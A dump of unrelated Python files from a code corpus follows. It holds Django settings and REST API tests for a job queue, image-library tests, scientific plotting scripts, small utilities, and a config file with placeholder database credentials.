d = self.checked_out.get(class_path, None)
if not d:
return
if time.time() < d['timeout_time']:
# We're being called for the first time, or someone has updated timeout_time since the timeout was set (e.g. results came in)
tornado.ioloop.IOLoop.instance().add_timeout(d['timeout_time'], lambda: self.timeout_class(runner, class_path))
return
try:
self.check_in_class(runner, class_path, timed_out=True)
except ValueError:
# If another builder has checked out the same class in the mean time, don't throw an error.
pass
def early_shutdown(self):
for class_path in self.checked_out.keys():
self.check_in_class(None, class_path, early_shutdown=True)
self.shutdown()
def shutdown(self):
if self.shutting_down:
# Try not to shut down twice.
return
self.shutting_down = True
self.test_queue.finalize()
iol = tornado.ioloop.IOLoop.instance()
# Can't immediately call stop, otherwise the runner currently POSTing its results will get a Connection Refused when it tries to ask for the next test.
if self.runners_outstanding:
# Stop in 5 seconds if all the runners_outstanding don't come back by then.
iol.add_timeout(time.time()+self.shutdown_delay_for_outstanding_runners, iol.stop)
else:
# Give tornado enough time to finish writing to all the clients, then shut down.
iol.add_timeout(time.time()+self.shutdown_delay_for_connection_close, iol.stop)
| StarcoderdataPython |
3354890 | <reponame>pysrc/fractal
# FASS曲线
from fractal import Pen
p = Pen([420,420])
p.setPoint([10,10])
p.doD0L(omega = "L", P = {"L": "LFRFL-FF-RFLFR+FF+LFRFL", "R": "RFLFR+FF+LFRFL-FF-RFLFR"}, delta = 90, times = 4, length = 200 , rate = 3)
p.wait() | StarcoderdataPython |
4817785 | <reponame>radicalgraphics/Pillow
from tester import *
from PIL import Image
def test_sanity():
bbox = lena().getbbox()
assert_true(isinstance(bbox, tuple))
def test_bbox():
# 8-bit mode
im = Image.new("L", (100, 100), 0)
assert_equal(im.getbbox(), None)
im.paste(255, (10, 25, 90, 75))
assert_equal(im.getbbox(), (10, 25, 90, 75))
im.paste(255, (25, 10, 75, 90))
assert_equal(im.getbbox(), (10, 10, 90, 90))
im.paste(255, (-10, -10, 110, 110))
assert_equal(im.getbbox(), (0, 0, 100, 100))
# 32-bit mode
im = Image.new("RGB", (100, 100), 0)
assert_equal(im.getbbox(), None)
im.paste(255, (10, 25, 90, 75))
assert_equal(im.getbbox(), (10, 25, 90, 75))
im.paste(255, (25, 10, 75, 90))
assert_equal(im.getbbox(), (10, 10, 90, 90))
im.paste(255, (-10, -10, 110, 110))
assert_equal(im.getbbox(), (0, 0, 100, 100))
| StarcoderdataPython |
4804152 | """
Django settings for filmer project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
import dj_database_url
from dotenv import load_dotenv
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv("DJANGO_SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.getenv("DEBUG") == "True"
ALLOWED_HOSTS = ["*"]
SITE_ID = 1
# Application definition
DJANGO_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.postgres",
"django.contrib.sites",
]
THIRD_PARTY_APPS = [
"crispy_forms",
"django_filters",
"django_extensions",
"rest_framework",
"debug_toolbar",
]
HEALTHCHECKS_APPS = [
"health_check", # required
"health_check.db", # stock Django health checkers
# 'health_check.cache',
# 'health_check.storage',
"health_check.contrib.migrations",
# 'health_check.contrib.celery', # requires celery
# 'health_check.contrib.celery_ping', # requires celery
# 'health_check.contrib.psutil', # disk and memory utilization; requires psutil
# 'health_check.contrib.s3boto3_storage', # requires boto3 and S3BotoStorage backend
# 'health_check.contrib.rabbitmq', # requires RabbitMQ broker
# 'health_check.contrib.redis', # requires Redis broker
]
FILMER_APPS = [
"api",
"ui",
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + HEALTHCHECKS_APPS + FILMER_APPS
DEV_MIDDLEWARE = [
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"whitenoise.middleware.WhiteNoiseMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
] + DEV_MIDDLEWARE
ROOT_URLCONF = "filmer.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "filmer.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {}
DATABASES["default"] = dj_database_url.config(conn_max_age=600)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"console": {
"class": "logging.StreamHandler",
},
},
"root": {
"handlers": ["console"],
"level": "DEBUG",
},
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "assets"
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
REST_FRAMEWORK = {
"DEFAULT_FILTER_BACKENDS": ["django_filters.rest_framework.DjangoFilterBackend"],
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.PageNumberPagination",
"PAGE_SIZE": 10,
}
OMDB_API_KEY = os.getenv("OMDB_API_KEY", "fake")
TMDB_API_KEY = os.getenv("TMDB_API_KEY", "fake")
LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "/api/api-auth/login/"
| StarcoderdataPython |
3352635 | import csv
from random import randint
from datetime import datetime
from datetime import timedelta
from functools import reduce
candidates = ['<NAME>', '<NAME>', '<NAME>']
cuss_words = ['fuck', 'shit', 'ass', 'bitch',
'douche', 'dick', 'damn', 'covfefe']
# Three hours in `interval` second intervals.
interval = 60
times = [datetime.now() + timedelta(seconds=(interval*t))
for t in range(int(60/interval) * 60 * 3)]
def random_walk(walk_length):
return reduce(lambda a,x: a + [max(0, a[-1] + (-1)**randint(0,1)*x)],
[randint(0,3) for _ in range(walk_length)],
[randint(0,10)])
dataset = [{'subject': c, 'word': w, 'time': t.isoformat(), 'count': v}
for c in candidates
for w in cuss_words
for t,v in zip(times, random_walk(len(times)))]
with open('sample_data.csv', 'w') as out:
fieldnames = ["subject", "word", "time", "count"]
writer = csv.DictWriter(out, fieldnames=fieldnames, delimiter="\t")
writer.writeheader()
for row in sorted(dataset, key=lambda x: x['time']):
writer.writerow(row)
| StarcoderdataPython |
3260356 | <filename>tools/_generic/randomize-csv.py
#!/usr/bin/env python3
import csv
import re
from argparse import ArgumentParser
from collections import defaultdict
from random import shuffle
from pprint import pprint
config = None
limit = -1
def randomize():
with open(config.srcfile, "r") as csvfile:
reader = csv.reader(csvfile)
headers = next(reader)
values = defaultdict(list)
# read CSV into COLUMNS ...
for rowcount, row in enumerate(reader):
# print(row)
for colname, val in zip(headers, row):
values[colname].append(val)
if rowcount == limit:
break
# shuffle columns
for _, col in values.items():
shuffle(col)
# transpose columns into rows
rows = zip(*[values[hd] for hd in headers])
# overwrite old file with shuffled values
with open(config.srcfile, "w") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(headers)
for row in rows:
writer.writerow(row)
if __name__ == "__main__":
parser = ArgumentParser(description="Randomize CSV files")
parser.add_argument("srcfile", help="Which file to randomize")
config = parser.parse_args()
randomize()
| StarcoderdataPython |
1745419 | from __future__ import unicode_literals
import json
import time
import django
import django.utils.timezone as timezone
from django.test import TestCase, TransactionTestCase
from rest_framework import status
import error.test.utils as error_test_utils
import job.test.utils as job_test_utils
import queue.test.utils as queue_test_utils
import recipe.test.utils as recipe_test_utils
import storage.test.utils as storage_test_utils
import util.rest as rest_util
from job.configuration.data.job_data import JobData
from job.models import Job
from queue.models import Queue
class TestJobLoadView(TransactionTestCase):
def setUp(self):
django.setup()
self.job_type1 = job_test_utils.create_job_type(name='test1', version='1.0', category='test-1', priority=1)
queue_test_utils.create_job_load(job_type=self.job_type1, pending_count=1)
# sleep's are needed because if the job load entries end up with the same timestamp, there will be fewer
# entries in the GET then expected in the tests. sleep's ensure the timestamps will be different as they
# maintain 3 sig figs in the decimal
time.sleep(0.001)
self.job_type2 = job_test_utils.create_job_type(name='test2', version='1.0', category='test-2', priority=2)
queue_test_utils.create_job_load(job_type=self.job_type2, queued_count=1)
time.sleep(0.001)
self.job_type3 = job_test_utils.create_job_type(name='test3', version='1.0', category='test-3', priority=3)
queue_test_utils.create_job_load(job_type=self.job_type3, running_count=1)
def test_successful(self):
"""Tests successfully calling the job load view."""
url = rest_util.get_url('/load/')
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 3)
def test_job_type_id(self):
"""Tests successfully calling the job laod view filtered by job type identifier."""
url = rest_util.get_url('/load/?job_type_id=%s' % self.job_type1.id)
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['pending_count'], 1)
def test_job_type_name(self):
"""Tests successfully calling the job load view filtered by job type name."""
url = rest_util.get_url('/load/?job_type_name=%s' % self.job_type2.name)
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['queued_count'], 1)
def test_job_type_category(self):
"""Tests successfully calling the job load view filtered by job type category."""
url = rest_util.get_url('/load/?job_type_category=%s' % self.job_type3.category)
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['running_count'], 1)
def test_job_type_priority(self):
"""Tests successfully calling the job load view filtered by job type priority."""
url = rest_util.get_url('/load/?job_type_priority=%s' % self.job_type1.priority)
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['pending_count'], 1)
def test_max_duration(self):
"""Tests calling the job load view with time values that define a range greater than 31 days"""
url = rest_util.get_url('/load/?started=2015-01-01T00:00:00Z&ended=2015-02-02T00:00:00Z')
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
class TestQueueNewJobView(TransactionTestCase):
def setUp(self):
django.setup()
self.interface = {
'version': '1.1',
'command': 'test_cmd',
'command_arguments': 'test_arg',
'input_data': [{
'media_types': ['image/png'],
'type': 'file',
'name': 'input_file',
}],
'output_data': [{
'name': 'output_file',
'type': 'file',
'media_type': 'image/png',
}],
'shared_resources': [],
}
self.job_type = job_test_utils.create_job_type(interface=self.interface)
self.workspace = storage_test_utils.create_workspace()
self.file1 = storage_test_utils.create_file(workspace=self.workspace)
def test_bad_job_type_id(self):
"""Tests calling the queue new job view with an invalid job type ID."""
json_data = {
'job_type_id': -1234,
'job_data': {},
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
def test_bad_type_job_type_id(self):
"""Tests calling the queue new job view with a string job type ID (which is invalid)."""
json_data = {
'job_type_id': 'BAD',
'job_data': {},
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_missing_job_type_id(self):
"""Tests calling the queue new job view without the required job type ID."""
json_data = {
'job_data': {},
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_bad_type_args(self):
"""Tests calling the queue new job view with a string job_data value (which is invalid)."""
json_data = {
'job_type_id': self.job_type.id,
'job_data': 'BAD',
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_invalid_args(self):
"""Tests calling the queue new job view with invalid job_data for the job."""
json_data = {
'job_type_id': self.job_type.id,
'job_data': {},
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_successful(self):
"""Tests calling the queue new job view successfully."""
json_data = {
'job_type_id': self.job_type.id,
'job_data': {
'version': '1.0',
'input_data': [{
'name': 'input_file',
'file_id': self.file1.id,
}],
'output_data': [{
'name': 'output_file',
'workspace_id': self.workspace.id,
}],
},
}
url = rest_util.get_url('/queue/new-job/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)
result = json.loads(response.content)
self.assertTrue(response['Location'])
self.assertEqual(result['job_type']['id'], self.job_type.id)
self.assertEqual(result['status'], 'QUEUED')
self.assertEqual(len(result['inputs']), 1)
self.assertEqual(len(result['outputs']), 1)
class TestQueueNewRecipeView(TestCase):
def setUp(self):
django.setup()
def test_bad_recipe_id(self):
"""Tests calling the queue recipe view with an invalid recipe ID."""
json_data = {
'recipe_type_id': -1234,
'recipe_data': {},
}
url = rest_util.get_url('/queue/new-recipe/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
def test_bad_type_recipe_id(self):
"""Tests calling the queue recipe view with a string recipe ID (which is invalid)."""
json_data = {
'recipe_id': 'BAD',
'recipe_data': {},
}
url = rest_util.get_url('/queue/new-recipe/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_missing_recipe_id(self):
"""Tests calling the queue recipe view without the required job type."""
json_data = {
'recipe_data': {},
}
url = rest_util.get_url('/queue/new-recipe/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
def test_successful(self):
"""Tests calling the queue recipe view successfully."""
recipe_type = recipe_test_utils.create_recipe_type()
workspace = storage_test_utils.create_workspace()
recipe_data = {
'version': '1.0',
'input_data': [],
'workspace_id': workspace.id,
}
json_data = {
'recipe_type_id': recipe_type.id,
'recipe_data': recipe_data,
}
url = rest_util.get_url('/queue/new-recipe/')
response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)
result = json.loads(response.content)
self.assertTrue(response['Location'])
self.assertEqual(result['recipe_type']['id'], recipe_type.id)
class TestQueueStatusView(TransactionTestCase):
def setUp(self):
django.setup()
self.job_type = job_test_utils.create_job_type()
self.queue = queue_test_utils.create_queue(job_type=self.job_type, priority=123)
def test_successful(self):
"""Tests successfully calling the queue status view."""
url = rest_util.get_url('/queue/status/')
response = self.client.generic('GET', url)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['job_type']['id'], self.job_type.id)
self.assertEqual(result['results'][0]['count'], 1)
self.assertEqual(result['results'][0]['highest_priority'], 123)
self.assertIsNotNone(result['results'][0]['longest_queued'])
class TestRequeueJobsView(TestCase):
def setUp(self):
django.setup()
self.job_1 = job_test_utils.create_job(status='RUNNING', num_exes=1)
self.job_2 = job_test_utils.create_job(input={}, num_exes=0)
self.job_3 = job_test_utils.create_job(status='FAILED', num_exes=1)
definition = {
'version': '1.0',
'input_data': [],
'jobs': [{
'name': 'Job 1',
'job_type': {
'name': self.job_1.job_type.name,
'version': self.job_1.job_type.version,
}
}, {
'name': 'Job 2',
'job_type': {
'name': self.job_2.job_type.name,
'version': self.job_2.job_type.version,
},
'dependencies': [{
'name': 'Job 1'
}],
}],
}
self.recipe_type = recipe_test_utils.create_recipe_type(definition=definition)
self.recipe = recipe_test_utils.create_recipe(recipe_type=self.recipe_type)
self.recipe_job = recipe_test_utils.create_recipe_job(recipe=self.recipe, job_name='Job 1', job=self.job_1)
self.recipe_job = recipe_test_utils.create_recipe_job(recipe=self.recipe, job_name='Job 2', job=self.job_2)
def test_v6(self):
"""Tests calling the v6 requeue view which should return 404"""
json_data = {
'job_ids': [1000],
}
url = '/v6/queue/requeue-jobs/'
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
def test_no_match(self):
"""Tests calling the requeue view where there are no matching jobs to schedule."""
json_data = {
'job_ids': [1000],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 0)
def test_requeue_canceled(self,):
"""Tests calling the requeue view successfully for a job that was never queued."""
# make sure the job is in the right state despite not actually having been run
Job.objects.update_status([self.job_2], 'CANCELED', timezone.now())
base_count = Queue.objects.count()
json_data = {
'job_ids': [self.job_2.id],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
result = json.loads(response.content)
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_2.id)
self.assertEqual(result['results'][0]['status'], 'PENDING')
self.assertEqual(Queue.objects.count() - base_count, 0)
def test_requeue_failed(self,):
"""Tests calling the requeue view successfully for a job that was previously queued."""
job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
# make sure the job is in the right state despite not actually having been run
Job.objects.update_status([self.job_2], 'FAILED', timezone.now(), error_test_utils.create_error())
self.job_2.input = JobData().get_dict()
self.job_2.num_exes = 2
self.job_2.save()
base_count = Queue.objects.count()
json_data = {
'job_ids': [self.job_2.id],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_2.id)
self.assertEqual(result['results'][0]['status'], 'QUEUED')
self.assertEqual(Queue.objects.count() - base_count, 1)
def test_requeue_ignored(self,):
"""Tests calling the requeue view when the job has already completed."""
job_test_utils.create_job_exe(job=self.job_2, status='COMPLETED')
Job.objects.update_status([self.job_2], 'COMPLETED', timezone.now())
json_data = {
'job_ids': [self.job_2.id],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_2.id)
self.assertEqual(result['results'][0]['status'], 'COMPLETED')
def test_status(self):
"""Tests successfully calling the requeue view filtered by status."""
json_data = {
'status': self.job_3.status,
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_3.id)
def test_job_ids(self):
"""Tests successfully calling the requeue view filtered by job identifier."""
json_data = {
'job_ids': [self.job_3.id],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_3.id)
def test_job_type_ids(self):
"""Tests successfully calling the requeue view filtered by job type identifier."""
json_data = {
'job_type_ids': [self.job_3.job_type.id],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['job_type']['id'], self.job_3.job_type.id)
def test_job_type_names(self):
"""Tests successfully calling the requeue view filtered by job type name."""
json_data = {
'job_type_names': [self.job_3.job_type.name],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['job_type']['name'], self.job_3.job_type.name)
# TODO: Remove when v5 deprecated
def test_job_type_categories(self):
"""Tests successfully calling the requeue view filtered by job type category."""
json_data = {
'job_type_categories': [self.job_3.job_type.category],
}
url = '/v5/queue/requeue-jobs/'
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['job_type']['category'], self.job_3.job_type.category)
def test_error_categories(self):
"""Tests successfully calling the requeue view filtered by job error category."""
error = error_test_utils.create_error(category='DATA')
job = job_test_utils.create_job(error=error)
json_data = {
'error_categories': [error.category],
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], job.id)
self.assertEqual(result['results'][0]['error']['category'], error.category)
def test_priority(self):
"""Tests successfully calling the requeue view changing the queue priority."""
job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
# make sure the job is in the right state despite not actually having been run
Job.objects.update_status([self.job_2], 'FAILED', timezone.now(), error_test_utils.create_error())
self.job_2.input = JobData().get_dict()
self.job_2.num_exes = 2
self.job_2.save()
json_data = {
'job_ids': [self.job_2.id],
'priority': 123,
}
url = rest_util.get_url('/queue/requeue-jobs/')
response = self.client.post(url, json.dumps(json_data), 'application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
result = json.loads(response.content)
self.assertEqual(len(result['results']), 1)
self.assertEqual(result['results'][0]['id'], self.job_2.id)
self.assertEqual(result['results'][0]['status'], 'QUEUED')
queue = Queue.objects.get(job_id=self.job_2.id)
self.assertEqual(queue.priority, 123)
| StarcoderdataPython |
3365518 | import mercadopago
import json
mp = mercadopago.MP("ACCESS_TOKEN")
payment = mp.post("/v1/payments", {
"transaction_amount": 100,
"token": "<KEY>",
"description": "Title of what you are paying for",
"installments": 1,
"payer": {
"type": "customer",
"id": "12345678-abcdefghij"
}
});
print(json.dumps(payment, indent=4))
| StarcoderdataPython |
1741945 | <filename>pyfileconf_datacode/config.py
from typing import Iterable, Dict, List
from pyfileconf.selector.models.itemview import ItemView
def config_dependencies_for_section_path_strs(
section_path_strs: Iterable[str],
) -> Dict[str, List["ItemView"]]:
from pyfileconf import context
from pyfileconf.selector.models.itemview import ItemView
config_deps: Dict[str, List[ItemView]] = {}
for sp_str in section_path_strs:
config_deps[sp_str] = [
ItemView.from_section_path_str(sp.path_str)
for sp in context.config_dependencies[sp_str]
]
return config_deps
| StarcoderdataPython |
3355315 | <reponame>rafarbop/Python<gh_stars>0
# Desafio 27 Curso em Video Python
# Este programa ler o nome completo de uma pessoa e mostra o primeiro e o último nome.
# By Rafabr
import os
os.system('clear')
print('\nDesafio 27')
print('Este programa ler o nome completo de uma pessoa e mostra o primeiro e o último nome.\n\n')
nome = str(input('Digite o nome completo de uma pessoa: ')).lower().strip()
print()
print(f"O primeiro nome da pessoa informada é: {nome.split()[0].title()}")
print(f"O último nome da pessoa informada é: {nome.split()[-1].title()}")
print('\n---Fim da execução---\n')
| StarcoderdataPython |
3232867 | from .base import Base
from ..responses import user
class UserCategory(Base):
async def get_me(self, **kwargs) -> user.User:
params = self.get_set_params(locals())
return user.User(
**await self.api.request(
"getMe", params
)
)
| StarcoderdataPython |
3207456 | <gh_stars>1-10
from vedo import Plotter
from morphapi.api.neuromorphorg import NeuroMorpOrgAPI
api = NeuroMorpOrgAPI()
# ---------------------------- Downloading metadata --------------------------- #
# Get metadata for pyramidal neurons from the mouse cortex.
metadata, _ = api.get_neurons_metadata(
size=10, # Can get the metadata for up to 500 neurons at the time
species="mouse",
cell_type="pyramidal",
brain_region="neocortex",
)
# To get a list of available query fields: print(api.fields)
# To get a list of valid values for a field: print(api.get_fields_values(field))
print("Neurons metadata:")
print(metadata[0])
# ---------------------------- Download morphology --------------------------- #
neurons = api.download_neurons(metadata[5])
# ------------------------------- Visualisation ------------------------------ #
print("creating meshes")
neurons = [neuron.create_mesh()[1] for neuron in neurons]
print("visualizing")
vp = Plotter(shape=(1, len(neurons)), axes=1)
vp.show(neurons)
| StarcoderdataPython |
150759 | """
The program SUMS all of the NUMBERS entered by the USER,
while ignoring any input that is not a VALID NUMBER.
"""
# Import MATH module
import math
# Acquisition and Control of the DATA entered by the USER
number = input("Enter the NUMBER to add: ")
numbers = []
while number != "":
try:
# Storing the entered number
if "." not in number:
numbers.append(int(number))
else:
numbers.append(float(number))
# Displaying the CURRENT SUM
current_sum = sum(numbers)
if current_sum - math.trunc(current_sum) == 0:
current_sum = int(current_sum)
print("Current Sum = " + str(current_sum))
number = input("Enter the NUMBER to add: ")
# Exception -> Value Error
except ValueError:
print("Warning, a NON-NUMERIC value has been entered.")
number = input("Enter the NUMBER to add: ")
# Displaying the RESULTS
print("The SUM of the NUMBERS entered is {} ".format(current_sum))
print("NUMBERS entered -> ", end="")
if len(numbers) == 0:
print("NO ONE")
else:
for value in numbers:
print(value, end=" ")
| StarcoderdataPython |
4837862 | import matplotlib.pyplot as plt
import mdtraj as md
from contact_map import ContactMap
pdb_list = [ "../pdb_dir_1_500ns/frame0.pdb",
"../pdb_dir_5001_6000ns/frame4164.pdb"]
# Program takes about several minutes to finish
# It is a bit slow;
for i in range(len(pdb_list)):
pdb = md.load_pdb(pdb_list[i])
frame_contacts = ContactMap(pdb[0], cutoff=1.5)
(fig, ax) = frame_contacts.residue_contacts.plot(cmap='seismic', vmin=-1, vmax=1)
plt.xlabel("Residue")
plt.ylabel("Residue")
fig.savefig(f'cont-map-{i}.pdf', format='pdf', dpi=500)
plt.close()
# Calculate the difference between two contact maps
diff = contacts[1] - contacts[0]
(fig, ax) = diff.residue_contacts.plot(cmap='seismic', vmin=-1, vmax=1)
plt.xlabel("Residue")
plt.ylabel("Residue")
fig.savefig(f'cont-map-diff.pdf', format='pdf', dpi=500)
plt.close()
| StarcoderdataPython |
1625486 | from django.contrib import admin
from django.urls import path, include
from . import views
# /student/..
urlpatterns = [
path('', views.studentDashboard, name="student_dashboard"),
path('postad/<str:pk>/', views.postAd, name="post_ad"),
path('ads/', views.Ads, name="ads"),
path('wishlist/', views.wishList, name="wishlist"),
path('<str:pk>/ads/', views.AdsDelete, name="ads_delete"),
path('tutors/', views.allTutors, name="all_tutors"),
path('tutors/<int:id>', views.SpecificTutor, name="specific_tutor"),
path('tutors/<int:id>/like/', views.PostLikeToggle.as_view(), name="post_like_std"),
path('tutors/<int:id>/like/api/', views.PostLikeAPIToggle.as_view(), name="post_like_api_std"),
path('tutors/<int:id>/wish-list/', views.WishlistApi.as_view(), name="wish_list"),
path('tutors/<int:id>/', views.inviteFordemo, name="tutor_invite"),
path('tutors/invited/', views.invited, name="invited"),
path('invitaions/', views.invitations, name="invitations_student"),
path("confirminvite/<int:id>/", views.acceptInvitation , name="accept_invite"),
path("rejectinvite/<int:id>/", views.rejectInvite , name="reject_invite_std"),
path("about/", views.aboutStudent , name="student_about"),
path("delaccount/", views.del_account_student , name="del_account"),
path("yourad/<int:id>/", views.view_your_ad, name="view_your_ad_std"),
path("activate/<uidb64>/<token>/", views.activate_view, name="activate"),
]
| StarcoderdataPython |
1728514 | MYSQL_USER = "root"
MYSQL_DATABASE = "database"
MYSQL_HOST = "127.0.0.1"
MYSQL_PORT = 3306
MYSQL_PASSWORD = "password"
PORT = 8080
HOST = "127.0.0.1"
DEBUG = False
REQUESTS_PER_PAGE = 10
BACKEND_REQUESTS_PER_PAGE = 5
NETEASE_PHONE = "12312345678"
